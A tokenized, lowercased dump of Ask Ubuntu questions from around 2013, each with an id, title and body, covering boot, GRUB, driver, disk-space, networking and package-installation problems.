# # # end /etc/grub.d/30_os-prober # # # > > # # # begin /etc/grub.d/30_uefi-firmware # # # > # # # end /etc/grub.d/30_uefi-firmware # # # > > # # # begin /etc/grub.d/40_custom # # # > # this file provides an easy way to add custom menu entries . simply type the > # menu entries you want to add after this comment . be careful not to change > # the 'exec tail ' line above . > # # # end /etc/grub.d/40_custom # # # > > # # # begin /etc/grub.d/41_custom # # # if [ -f $ { config_directory } /custom.cfg ] ; then source > $ { config_directory } /custom.cfg elif [ -z `` $ { config_directory } '' -a -f > $ prefix/custom.cfg ] ; then source $ prefix/custom.cfg ; fi > # # # end /etc/grub.d/41_custom # # # > -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- > > =============================== sda4/etc/fstab : ================================ > > -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- > # /etc/fstab : static file system information . > # > # use 'blkid ' to print the universally unique identifier for a > # device ; this may be used with uuid= as a more robust way to name devices > # that works even if disks are added and removed . see fstab ( 5 ) . > # > # < file system > < mount point > < type > < options > < dump > < pass > > # / was on /dev/sda4 during installation uuid=a0377dfb-e3c9-4000-972b-0e4300d38516 / ext4 > errors=remount-ro 0 1 > # /boot/efi was on /dev/sda1 during installation > # uuid=04af-a81d /boot/efi vfat defaults 0 1 > # swap was on /dev/sda5 during installation uuid=69411fce-44e7-42c5-8cfe-b6a8e03e0a89 none swap sw > 0 0 > # uuid=04af-a81d /boot/efi vfat defaults 0 1 > -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- > > =================== sda4 : location of files loaded by grub : ==================== > > gib - gb file fragment ( s ) > > 81.396614075 = 87.398948864 boot/grub/grub.cfg 1 > 85.545436859 = 91.853713408 boot/initrd.img-3.5.0-17-generic 1 > 74.295482635 = 79.774167040 boot/initrd.img-3.5.0-26-generic 1 > 81.375942230 = 87.376752640 boot/vmlinuz-3.5.0-17-generic 1 > 74.129776001 = 79.596240896 boot/vmlinuz-3.5.0-26-generic 1 > 74.295482635 = 79.774167040 initrd.img 1 > 74.295482635 = 79.774167040 initrd.img.old 1 > 74.129776001 = 79.596240896 vmlinuz 1 > 74.129776001 = 79.596240896 vmlinuz.old 1
271328	how to connect and create a database in mysql ?	i want to install mysql and create a database on it using the following code : sudo apt-get install mysql-server mysqladmin -h localhost -u { username } -p create lrs i get the following message after executing the second line : enter password : mysqladmin : connect to server at 'localhost ' failed error : 'access denied for user ' { username } ' @ 'localhost ' ( using password : yes ) ' what is the problem ?
271330	ubuntu shows wrong graphics card	i installed ubuntu 12.04.2 lts on my dell inspiron laptop . i have an nvidia geforce gt 525m graphics card but lspci shows 540m ? i am unable to install nvidia drivers for this card now . i also asked another question about unable to install nvidia drivers here . i tried the solution mentioned in this answer , but does n't work . sorry if it is inappropriate to ask two questions about the same thing ... edit : result of lspci| grep vga 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 01:00.0 vga compatible controller : nvidia corporation gf108 [ geforce gt 540m ] ( rev a1 ) optirun glxspheres [ 1053.429303 ] [ error ] can not access secondary gpu - error : [ xorg ] ( ee ) nvidia ( 0 ) : failed to initialize the nvidia kernel module . please see the [ 1053.429348 ] [ error ] aborting because fallback start is disabled .
271335	gui broken after update to 12.10	i updated to ubuntu 12.10 using the update manager in ubuntu . ( `` a new version is available ... '' ) grub was broken and i think i managed to fix this but still the graphical output looks super weired : ( the unity sidebar is lost and i had to start firefox through the terminal [ strg ] + [ alt ] + [ t ] ) i already tried some apt-get with fglrx , gdm & ubuntu-desktop but nothing changed . graphics card : mobility radeon hd 2600
271337	ibus/mozc : how to make a fullwidth tilde ?	on ibus , i 've switched from the anthy input method to the mozc one . in anthy , pressing tilde ( shift+` makes a ~ ) will result in a full-width japanese style tilde instead , like ă . in mozc , if i type ~ , i just get the small ~ , and while i 'm typing a word , it does n't appear at all . mozc does have settings . but i do not know where to look to change this . anyone know how to make a full-width ă in mozc ?
271344	how can i play metal slug or the king of fighters ( kof ) 2002 in ubuntu	i use ubuntu 12.04 . i want to play metal slug and kof 2002 in my ubuntu . what should i do to install those games in my pc ? please show in detail ; i have never played such games in pc .
271347	ubuntu 12.10 - minicom how to get rs232 outputs correctly from juniper srx 210 router ?	i have this usb rs232 cable connected to my ubuntu and juniper router srx 210 . i set the communication to 9600 8n1 with ttyusb0 . but my display / output from router is broken how to fix it ? root @ sun-m14xr2 : ~ # minicom -s welcome to minicom 2.6.1 options : i18n compiled on may 1 2012 , 13:36:18 . port /dev/ttyusb0 press ctrl-a z for help on special keys y�y�ui�hh��6�6 [ э } m��� { �uj : ��뺻�*Ԫz�+�j��������+��6� , �� , ������o��v�*����ԫ+�׫vw� ��t��t֚�� �+�z �դ�v�+j �ִ�vv��t��� : �� [ ����eek��vox^uw틬��ˍu���v-� } ���ʔ��6�v�˅�������� : �jz�����+ : *뫕�� *���� ۅ ۅ ����� z��� z����� ������������_ym������������`� ! ����� 兺�+պj�z��*�����������+��mѱ��hnq���vo+u���ʔt�����*�_�y_ } yu뿿 ! �= ; ! �= ! ; ! ! �- # ���59 ! # 7���元���+�^޿������������gm�zo�b �������u # ) # ! # ������9 ! % % �庶���
271350	font rendering - infinality patches	there is a ppa https : //launchpad.net/~no1wantdthisname/+archive/ppa ? field.series_filter= with patches infinality đžn freetype and cairo for 11.04 11.10 12.04 12.10 13.04 but the updates are done only 12.10 and 13.04 at 12.10 and 13.04 patches imposed only on freetype i want to update the packages . how to impose these patches ? + i want to apply a patch to cairo at 12.10 and 13.04 there is how to enable infinality font rendering http : //www.infinality.net/forum/viewtopic.php ? f=2 & t=77 # p794 but can not i to apply it . i get an error . can anyone will make a detailed how - to ? please !
271354	why ca n't i resume my compaq 615 machine ?	i have installed ubuntu 12.04 on my compaq 615 machine about a week ago . i have a problem with suspend/sleep function . the device suspends and it can be waken up with no problem only in case where i have n't closed the lid . if i close the lid upon waking up i am encountered by a bright , white flickering screen upon which i have no other option than a button power off to resume my work . i suspect that there is something incompatible with the ati hd 3200 and ubuntu .
271355	why ca n't i boot windows 7 from grub when an ext-hdd is connected ?	i just installed ubuntu and i really like it , even though the dual-boot configuration took me at least 2 days : p my dual-boot works fine , except for the fact my windows does n't boot if one of my external drives is already connected ? here is my setup : i have an ssd for booting that i split ( 100gb for windows , 25gb for ubuntu ) , and i dual-drive with an hdd that i use for storage . i have an uefi-bios and 64x i7 cpu , 16gb ram . i have 2 external hdd 's ( for video and back-ups ) that i allmost never disconnect . if i come out grub , i can get into ubuntu without any trouble of my ext-hdd . but when i select my win7 and 1 of my hdd 's is connected with 1 of my usb-ports , i get a black screen with a text-cursor . i ca n't type or do anything , only hard reset . i re-installed my usb-ports , searched for hidden boot.ini in my hdd 's , checked my boot-order in bios , but nothing works . so the only option is something with grub i think ? is there a way to make changes to my usb-boot ? or does anyone now what is holding my windows from booting ? keep in mind that there is absolutely no problem booting windows if ext-hdd is not connected ? hope you guys can help me , because i know nothing about ubuntu and grub : d
271357	ubuntu on 2013 imac 27 '' with fusion drive ?	i know i could trawl the internet for information about how well the imac 2003 runs on ubuntu but every time i bought a new imac all the problems everyone had where non existent , possible as we get the later models in oz or the users are a little less technical , i 'm not sure . so the internet trawl is not very reliable for information . ( have owned 4 different imacs ) any ubuntu folk out there running the current model ? what are the issues ? any information is appreciated .
271360	when installing updates or from software center in ubuntu 12.04 , error messages	i have a new computer with plenty of disk space . there 's a solid state boot drive and a regular disk where i put my files . so the primary thing happening is that for the last few weeks , whenever i try to install updates or download from the software center , i get for updates this , and for software this . does anybody have any clue what 's going on regarding the problem ? i did change some settings on the display with my unity recently , and i also a few weeks ago finally figured out how to access the big hard drive by doing sudo chown user /mnt/data0 . i had also disabled global menus . could that be causing the problem . incidentally , i 've also been having some problems with the video card not saving my settings , so i have to reset them each time i turn on the computer , even though they were saved for the first few weeks . $ sudo dpkg -- configure -a setting up initramfs-tools ( 0.99ubuntu13.1 ) ... update-initramfs : deferring update ( trigger activated ) setting up linux-image-3.2.0-39-generic ( 3.2.0-39.62 ) ... running depmod . update-initramfs : deferring update ( hook will be called later ) the link /initrd.img is a dangling linkto /boot/initrd.img-3.2.0-39-generic examining /etc/kernel/postinst.d . run-parts : executing /etc/kernel/postinst.d/apt-auto-removal 3.2.0-39-generic /boot/vmlinuz-3.2.0-39-generic run-parts : executing /etc/kernel/postinst.d/dkms 3.2.0-39-generic /boot/vmlinuz-3.2.0-39-generic run-parts : executing /etc/kernel/postinst.d/initramfs-tools 3.2.0-39-generic /boot/vmlinuz-3.2.0-39-generic update-initramfs : generating /boot/initrd.img-3.2.0-39-generic gzip : stdout : no space left on device e : mkinitramfs failure cpio 141 gzip 1 update-initramfs : failed for /boot/initrd.img-3.2.0-39-generic with 1. run-parts : /etc/kernel/postinst.d/initramfs-tools exited with return code 1 failed to process /etc/kernel/postinst.d at /var/lib/dpkg/info/linux-image-3.2.0-39-generic.postinst line 1010. dpkg : error processing linux-image-3.2.0-39-generic ( -- configure ) : subprocess installed post-installation script returned error exit status 2 dpkg : dependency problems prevent configuration of linux-image-generic : linux-image-generic depends on linux-image-3.2.0-39-generic ; however : package linux-image-3.2.0-39-generic is not configured yet . dpkg : error processing linux-image-generic ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of linux-generic : linux-generic depends on linux-image-generic ( = 3.2.0.39.47 ) ; however : package linux-image-generic is not configured yet . dpkg : error processing linux-generic ( -- configure ) : dependency problems - leaving unconfigured processing triggers for initramfs-tools ... update-initramfs : generating /boot/initrd.img-3.2.0-38-generic gzip : stdout : no space left on device e : mkinitramfs failure cpio 141 gzip 1 update-initramfs : failed for /boot/initrd.img-3.2.0-38-generic with 1. dpkg : error processing initramfs-tools ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : linux-image-3.2.0-39-generic linux-image-generic linux-generic initramfs-tools at this point we got a popup that said : low disk space the volume `` boot '' has only 0 bytes disk space remaining . you can free up disk space by removing unused programs or files , or by moving files to another disk or partition . this does n't really make sense to us . we 're having something of a hard time figuring out which drive we 're looking at when we look in the file system , but when we look at the drive bookmarked / which we thought was the solid state drive and then go into boot we see not very many files that are not very big - certainly not 120 gigs worth . about the drives : when we bought the computer about a month ago , we had the company install ubuntu . they made the 120 gigabyte solid state drive the boot drive as per our request . the 3 t drive seemed to be mounted , but the folks who installed ubuntu did not make the 3 terabyte drive visible to us and we were denied permissions to view it until i used the fix i mentioned in my original message above so as to be able to save to the drive . ( i still seem to be denied permission to view the `` lost and found '' folder though . ) then i copied the files i 'd saved on the solid state drive to the 3 t drive and deleted the files i 'd saved from the solid state drive to free up room . the solid state drive still has lots of room on it ( as of course does the other one ) . from what we can tell , the software and updates that get error messages seem to actually be getting installed ( i do n't know if correctly ) but generate long error messages each time . is it trying to install to both disks or something like that and generating an error message because the 3 t drive was n't installed/mounted correctly ? so sorry for any ignorance we 're showing . i 'm trying to learn all this , but still do n't really understand the file system very well and certainly am an ubuntu newbie . update april 12 , 2013 : hi , nikki . thanks so much for trying to help us . well , we finally were able to try to implement the steps and it failed . we got the following ( i had to delete some of it to make it fit in this message ) : user @ ubuntu : ~ $ sudo apt-get clean & & sudo apt-get autoremove reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : linux-generic : depends : linux-headers-generic ( = 3.2.0.39.47 ) but 3.2.0.40.48 is installed e : unmet dependencies . try using -f. user @ ubuntu : ~ $ uname -r 3.2.0-38-generic user @ ubuntu : ~ $ dpkg -- list | grep linux-image ii linux-image-3.2.0-29-generic 3.2.0-29.46 linux kernel image for version 3.2.0 on 64 bit x86 smp ii linux-image-3.2.0-37-generic 3.2.0-37.58 linux kernel image for version 3.2.0 on 64 bit x86 smp ii linux-image-3.2.0-38-generic 3.2.0-38.61 linux kernel image for version 3.2.0 on 64 bit x86 smp if linux-image-3.2.0-39-generic 3.2.0-39.62 linux kernel image for version 3.2.0 on 64 bit x86 smp if linux-image-3.2.0-40-generic 3.2.0-40.64 linux kernel image for version 3.2.0 on 64 bit x86 smp iu linux-image-generic 3.2.0.39.47 generic linux kernel image user @ ubuntu : ~ $ sudo apt-get purge linux-image-3.2.0.29-generic reading package lists ... done building dependency tree reading state information ... done note , selecting 'linux-image-3.2.0-29-generic ' for regex 'linux-image-3.2.0.29-generic' note , selecting 'linux-image-3.2.0-29-generic-pae ' for regex 'linux-image-3.2.0.29-generic' you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : linux-generic : depends : linux-headers-generic ( = 3.2.0.39.47 ) but 3.2.0.40.48 is to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . user @ ubuntu : ~ $ sudo apt-get purge linux-image-3.2.0.37-generic reading package lists ... done building dependency tree reading state information ... done note , selecting 'linux-image-3.2.0-37-generic ' for regex 'linux-image-3.2.0.37-generic' note , selecting 'linux-image-3.2.0-37-generic-pae ' for regex 'linux-image-3.2.0.37-generic' you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : linux-generic : depends : linux-headers-generic ( = 3.2.0.39.47 ) but 3.2.0.40.48 is to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . user @ ubuntu : ~ $ sudo apt-get purge linux-image-3.2.0.39-generic reading package lists ... done building dependency tree reading state information ... done note , selecting 'linux-image-3.2.0-39-generic ' for regex 'linux-image-3.2.0.39-generic' note , selecting 'linux-image-3.2.0-39-generic-pae ' for regex 'linux-image-3.2.0.39-generic' you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : linux-generic : depends : linux-headers-generic ( = 3.2.0.39.47 ) but 3.2.0.40.48 is to be installed linux-image-generic : depends : linux-image-3.2.0-39-generic but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . user @ ubuntu : ~ $ sudo apt-get purge linux-image-3.2.0.40-generic reading package lists ... done building dependency tree reading state information ... done note , selecting 'linux-image-3.2.0-40-generic ' for regex 'linux-image-3.2.0.40-generic' note , selecting 'linux-image-3.2.0-40-generic-pae ' for regex 'linux-image-3.2.0.40-generic' you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : linux-generic : depends : linux-headers-generic ( = 3.2.0.39.47 ) but 3.2.0.40.48 is to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . user @ ubuntu : ~ $ sudo apt-get purge linux-image-generic reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : linux-generic : depends : linux-image-generic ( = 3.2.0.39.47 ) but it is not going to be installed depends : linux-headers-generic ( = 3.2.0.39.47 ) but 3.2.0.40.48 is to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . user @ ubuntu : ~ $ sudo update-grub2 generating grub.cfg ... found linux image : /boot/vmlinuz-3.2.0-40-generic found linux image : /boot/vmlinuz-3.2.0-39-generic found linux image : /boot/vmlinuz-3.2.0-38-generic found initrd image : /boot/initrd.img-3.2.0-38-generic found linux image : /boot/vmlinuz-3.2.0-37-generic found initrd image : /boot/initrd.img-3.2.0-37-generic found linux image : /boot/vmlinuz-3.2.0-29-generic found initrd image : /boot/initrd.img-3.2.0-29-generic done user @ ubuntu : ~ $ sudo dpkg -- configure -a setting up initramfs-tools ( 0.99ubuntu13.1 ) ... update-initramfs : deferring update ( trigger activated ) setting up linux-image-3.2.0-40-generic ( 3.2.0-40.64 ) ... running depmod . update-initramfs : deferring update ( hook will be called later ) the link /initrd.img is a dangling linkto /boot/initrd.img-3.2.0-39-generic examining /etc/kernel/postinst.d . run-parts : executing /etc/kernel/postinst.d/apt-auto-removal 3.2.0-40-generic /boot/vmlinuz-3.2.0-40-generic run-parts : executing /etc/kernel/postinst.d/dkms 3.2.0-40-generic /boot/vmlinuz-3.2.0-40-generic run-parts : executing /etc/kernel/postinst.d/initramfs-tools 3.2.0-40-generic /boot/vmlinuz-3.2.0-40-generic update-initramfs : generating /boot/initrd.img-3.2.0-40-generic gzip : stdout : no space left on device e : mkinitramfs failure cpio 141 gzip 1 update-initramfs : failed for /boot/initrd.img-3.2.0-40-generic with 1. run-parts : /etc/kernel/postinst.d/initramfs-tools exited with return code 1 failed to process /etc/kernel/postinst.d at /var/lib/dpkg/info/linux-image-3.2.0-40-generic.postinst line 1010. dpkg : error processing linux-image-3.2.0-40-generic ( -- configure ) : subprocess installed post-installation script returned error exit status 2 dpkg : dependency problems prevent configuration of linux-generic : linux-generic depends on linux-headers-generic ( = 3.2.0.39.47 ) ; however : version of linux-headers-generic on system is 3.2.0.40.48. dpkg : error processing linux-generic ( -- configure ) : dependency problems - leaving unconfigured setting up linux-image-3.2.0-39-generic ( 3.2.0-39.62 ) ... running depmod . update-initramfs : deferring update ( hook will be called later ) the link /initrd.img is a dangling linkto /boot/initrd.img-3.2.0-40-generic examining /etc/kernel/postinst.d . run-parts : executing /etc/kernel/postinst.d/apt-auto-removal 3.2.0-39-generic /boot/vmlinuz-3.2.0-39-generic run-parts : executing /etc/kernel/postinst.d/dkms 3.2.0-39-generic /boot/vmlinuz-3.2.0-39-generic run-parts : executing /etc/kernel/postinst.d/initramfs-tools 3.2.0-39-generic /boot/vmlinuz-3.2.0-39-generic update-initramfs : generating /boot/initrd.img-3.2.0-39-generic gzip : stdout : no space left on device e : mkinitramfs failure cpio 141 gzip 1 update-initramfs : failed for /boot/initrd.img-3.2.0-39-generic with 1. run-parts : /etc/kernel/postinst.d/initramfs-tools exited with return code 1 failed to process /etc/kernel/postinst.d at /var/lib/dpkg/info/linux-image-3.2.0-39-generic.postinst line 1010. dpkg : error processing linux-image-3.2.0-39-generic ( -- configure ) : subprocess installed post-installation script returned error exit status 2 dpkg : dependency problems prevent configuration of linux-image-generic : linux-image-generic depends on linux-image-3.2.0-39-generic ; however : package linux-image-3.2.0-39-generic is not configured yet . dpkg : error processing linux-image-generic ( -- configure ) : dependency problems - leaving unconfigured processing triggers for initramfs-tools ... update-initramfs : generating /boot/initrd.img-3.2.0-38-generic gzip : stdout : no space left on device e : mkinitramfs failure cpio 141 gzip 1 update-initramfs : failed for /boot/initrd.img-3.2.0-38-generic with 1. dpkg : error processing initramfs-tools ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : linux-image-3.2.0-40-generic linux-generic linux-image-3.2.0-39-generic linux-image-generic initramfs-tools user @ ubuntu : ~ $ nikki : output of df command and your last command : user @ ubuntu : ~ $ df filesystem 1k-blocks used available use % mounted on /dev/sda2 19222656 5545404 12700716 31 % / devtmpfs 16425020 8 16425012 1 % /dev none 3291972 996 3290976 1 % /run none 5120 0 5120 0 % /run/lock none 16459852 736 16459116 1 % /run/shm /dev/sda1 90195 89356 0 100 % /boot /dev/sda5 88370448 33795068 50086420 41 % /home /dev/sdb1 2884283608 184345072 2553425284 7 % /mnt/data0 /dev/sdc1 488145616 404062976 84082640 83 % /media/karen_~1dri user @ ubuntu : ~ $ dpkg -l 'linux-* ' | sed '/^ii/ ! d ; / ' '' $ ( uname -r | sed `` s/\ ( . *\ ) -\ ( [ ^0-9 ] \+\ ) /\1/ '' ) '' '/d ; s/^ [ ^ ] * [ ^ ] * \ ( [ ^ ] *\ ) . */\1/ ; / [ 0-9 ] / ! d ' | xargs sudo apt-get -y purge [ sudo ] password for user : reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : linux-generic : depends : linux-headers-generic ( = 3.2.0.39.47 ) but 3.2.0.40.48 is to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) .
271365	accidentally deleted all partitions , how can i restore the operating systems ?	hi guys i installed ubuntu 12.04 ( x32 ) on my system and then side by side i had my windows7 ultimate ( x64 ) running aswell ( dual boot ) . last week for some reason i started getting a blue screen crash after running an update on ubuntu . blue screen said it has a crash with code bcc:0000145 , i didnt know what to make of it hence i thought just erase the whole hdd and start over with a fresh copy of windows . and this where ( i feel a major disaster struck , as i 'm a noob i 've no clue what i did was wrong ! ! ! ) i got into a huge problem , when i put in the windows oem cd and set the comp to boot from cd it was going all fine untill i deleted all my partitions into unallocated space and then wanted to make new partions and start fresh - bamm another blue screen of death . and this time after the blue screen it 's stopped booting from cd , and directly gave me an error message saying `` no such partition ; grub rescue '' i 've tried everything in my capacity to get it to work but i dont know clearly what to do further please help .
271371	trying to dual boot ubuntu , screws up windows 7 audio	i 've been trying to dual boot ubuntu along side windows 7 on an hp pavilion dv6 , however , every time i boot into windows after booting into ubuntu , i wind up needing to reinstall the audio drivers . the headphone jack does n't work , and anytime audio plays , it pops loudly before hand . info i had n't included before : when i reinstalled the audio driver and rebooted directly into windows from through grub , i had no audio problems .
271373	where can i get the compiz-check tool ?	i red about this tool but the source website is offline where can i find this tool ? more info : this is example of the use of compiz-check http : //www.makeuseof.com/tag/check-if-compiz-will-run-well-on-your-linux-box-with-compiz-check/ this is the source but it is offline http : //forlong.blogage.de/article/pages/compiz-check thanks
271375	rhino 3d 5.0 64bit	i would do anything to get rhino 5 working on my ubuntu 12.04.2 lts . first the extension of the file is .msi . i have tried using crossover to install it , but failed . i tried to install it using wine in terminal : wine msiexec /i rh50release_x64_en-us_20120927_2230.msi you see i am using rhino 5 3d 64bit 27.9.2012 . it started the installation then showed me this message : i would do anything to get it working .
271378	ubuntu server - how to connect to wireless wpa2 personal network ?	connecting to the wireless is relatively simple . after some struggle , you have wifi in your installer . you can install ubuntu server and everything is alright . you are ready to boot your new system . after setup finished , wifi settings disappeared . tl ; dr : how do i connect to a wireless ( wpa2 personal ) network from ubuntu server 12.10 ? what i have tried so far : connected with iw* commands . obtained ip address with dhclient . put these commands to etc/rc.local . on boot , the server waits 120 seconds with message `` waiting for network to come up '' to fix this , i removed everything /etc/network/interfaces ( wpa-psk and wpa-ssid ) . this did not work . it was still waiting . i found an answer , which said i could just remove the /etc/ ... ( the file that was in charge of the 120 second wait time . ) i did that , and kept a backup of it . now the server waits ~3 seconds ( modified sleep within the file ) and boots up . however , there 's no network connection available . it 's some dhcp error . as i was out of options , i tried using the one in comment . the one that used `` tee '' . turns out it does not work either . how can this whole thing be so inconsistent ? how can they not install the firmwares on the iso while it would perfectly fit ( 673+~10mb = 683 ) . how can the installer not copy the necessary files and set up the connection to be used later ? ( or ask if the user wants to use it . )
271382	how do i resolve this authentication error with openstack dashboard ?	i have successfully created a cloud using maas and juju from the documentation : https : //help.ubuntu.com/community/ubuntucloudinfrastructure relation between dashboard and keystone successfully created . but i am unable to login from the web interface of dashboard . it gives an error : error : an error occurred authenticating . please try again later . i know while preparing these servers i used openstack.cfg file which has the password : openstack . but i am unable to login with that password . then i tried to ssh keystone machine and here is maybe something useful : ls /var/lib/keystone/ cache glance.passwd keystone.db keystone.token s3_ec2_nova.passwd s3_nova-volume_ec2_nova.passwd i think this directory should have a file called : keystone.passwd ? i thought i can have a look to that file and get the random password by keystone , but that file does not exist . juju -v status shows that relation exists between dashboard and keystone . so what do i do now ?
271386	how to prevent alt-f1 from selecting dash	i am running ubuntu 12.04 . alt-f1 gets intercepted by unity ( i 'm guessing ) and highlights the dash icon . i do n't want it to do that , as i want alt-f1 for other purposes . i have scoured google and tried everything i could find , to no avail . how can i prevent unity from handling alt-f1 ?
271387	how to restart wifi connection ?	i think i do not have problem with hardware . sometimes the wifi connection simply disconnects , apparently . so this is not necessarily the same as this case , i might not need to reload any modules . but how to just restart wlan0 ? i tried restart network-manager , but this seems to leave wlan0 alone .
271388	how to install gcc-4.8	i checked the gcc version on my system . it is currently at 4.6.3 . i read that gcc-4.8 is out . i tried the following commands without success : sudo apt-get install gcc ( gcc is already the newest version ) sudo apt-get install gcc-4.8 ( unable to locate package ) does anyone know how to install this package on 12.04 ?
271391	switcheroo to discrete turns off backlight on laptop screen	amd cedar/ intel ironlake hybrid graphics . custom kernel 3.8.3 . free radeon xorg drivers . when i switch from integrated to discrete , i do a killall lightdm and x does n't automatically respawn like it does under my official ubuntu 3.2 kernel . so i have to sudo lightdm from another vterm . and then , i have no backlight . i ca n't see my lcd unless i have the sun shining on it . and if i connect it to hdmi tv , i get the tv picture okay and can fanagle to control it from there . but if i set mirroring screens , still no backlight , so i ca n't see what my laptop is ( or is not ) displaying .
271393	lost windows 8 installing ubuntu	i installed ubuntu latest version and it works but lost my windows . when i was doing installation from usb boot . i chose the typical installation because there was no other operating system found . i think i might have formatted the hard drive . i lost windows 8 . can anyone help i think windows 8 is in there but i do not know how to access it
271397	ubuntu 12.10 desktop - software updater not starting	i have a fully updated version of ubuntu 12.10 and am unable to start the `` software updater '' application , but am able to start the `` ubuntu software centre '' . i have tried sudo aptitude install update-manager and have also tried launching the update manager from the terminal using gksudo . i have also done the appropriate aptitude update and upgrade commands before trying the install of update manager . i get no error messages when performing sudo aptitude updateetc . if anyone could help me getting started on resolving this issue then it would be much appreciated .
271398	how to customize ubuntu into your own custom distribution	originally , i thought i would base my system off of debian . i soon realized that i wanted to integrate ubuntu 's easy yet powerful desktop functionality into my own distribution . thus , my os would be an unofficial branch of the ubuntu desktop edition ( much like kubuntu and xubuntu , although they are official ) . could you guys ( be polite this time ) and tell me things i need to know and tools i need to use for this project . i want to make my own os just based on ubuntu , thus changing brand names and themes . i also want to include my own `` closed source '' software that i developed . by the way i 'm not distributing to a large group of people just my job , and a few friends and family .
271400	how do i change video resolution before the video card takes over ?	i had a wide screen monitor die on me . : - ( the only other monitor i have does n't seem to support the wide resolution i had on the big monitor . when i try to boot it up , using the smaller monitor , it throws an error message `` input not supported '' . it does this using either my video card or my onboard graphics . the only thing i can figure is that the new monitor is puking over the wide screen resolution . any ideas ? thanks in advance for any help . os - linux mint 11 katya monitor - acer al1716w video card - geforce9700gt
271404	steam does n't open - no errors	for some reason my steam just broke today after working perfectly since i installed it a few days ago . it was originally installed via the deb from the steam site . so i uninstalled that using the ubuntu software center . then i installed steam-launcher . when i run it from the menu it does nothing at all . when i go through terminal it gives this message , no error : $ steam/usr/bin/steam : line 196 : /home/andrew/.local/share/steam/steam.sh : success so i purge-removed it and removed the .steams directory from my home directory but on re-installation its the same story . i am using xubuntu 12.10 64bit . it appears that steam .local/share/steam/steam.sh is blank . what is it meant to have in it ? i am so confused with how reinstalling it does n't fix it .
271408	how to hide unity dash `` more suggestions '' ( not unity-lens-shopping )	after removing `` unity-lens-shopping '' remain some annoying tips from the software center .
271414	a few questions before i get ubuntu	i do n't really know if this is the right place to ask these questions , but i would like to clear these up . ok , so , ubuntu sounds awesome , but i heard it has wine on it already ? if it does , that 's awesome . if not , well , i like wine . also , this is basically a version of linux , correct ? i just wanted to know if this stuff is correct or not . thanks for the help !
271418	deleted my ubuntu partition and now i get grub rescue	after deleting my partition i get the error : unknown filesystem grub resuce > i tried booting from a usb into ubuntu and supergrub but it just went straight back to grub rescue . any ideas ?
271419	removing default user data	i saw a post ages ago about how to remove the default user data that comes with the preview of ubuntu touch and now i can find it . i just want my table to look like i 've installed ubuntu touch from fresh so i can add my own user account and info . any help ?
271420	grub2 removed `` quiet splash '' options are ignored	after installing ubuntu 12.04 i have edited /etc/default/grub and changed the line grub_cmdline_linux_default= '' quiet splash '' to grub_cmdline_linux_default= '' '' then run # update-grub2 upon reboot i am not seeing the kernel messages printed to screen as expected . i only see a blank purple screen . what else needs to be configured for grub to display kernel messages upon boot ?
271423	strange behavior with ssh on ubuntu 12.04 server	recently i installed ubuntu server 12.04 on my computer at home with ssh support . i 'm using wifi instead of cable connection for this server . everything works fine except the fact that for some unknown reason when i try to access it during the day from my work ssh wo n't work . when i 'm home , it works . i did notice that sometimes i have to 'try ' to connect to the server locally once to make ssh work ( i 'm using putty for connection ) . steps i did to diagnose it : 1 . disabled power management for wifi device 2 . disabled dns for sshd 3 . tried to 'ping ' my server from my home nas ( no ping replies . i had to connect to my nas remotely for this ping from my work . therefore ssh ports are open ) 4 . when at home i tried to access my server from outside ( from a server on amazon ) and it worked . 5 . checked logs but could n't find anything related i do have ufw enabled and port 22 open on the server . i feel that this issue could be related to some kind of power management that put my wifi to sleep therefore ssh not accessible , but i do n't know where to look for power settings . almost forgot to mention that yesterday when i came home from work i tried to connect locally to this server and it was n't successful . then i logged in to the server and checked if ssh service was running and it was . then i tried to ping some server and only after that i was able to connect via ssh to this server . any advice or help would be really appreciated ... edit # 1 : i have a d-link 655 wireless router and my wifi card is asus usb-n13 ( stock drivers ) edit # 2 : i tried to ping google from the server ( physically connected ) today and was unable to for about 2-3 minutes . then , suddenly , server became responsive and available . iwconfig showed that i was always connected to the network .
271425	is openjdk6 still supported ?	i use openjdk6 , but is in necessary to update to openjdk7 ? it seems that oracle has dropped support for java 6 ... i read here that red hat will be providing support for openjdk6 : http : //java.about.com/b/2013/03/07/red-hat-assumes-leadership-of-openjdk-6.htm does that mean that ubuntu will continue to deliver security updates and bugfixes to openjdk6 ? or do i have to update ... i 'm using the current lts release
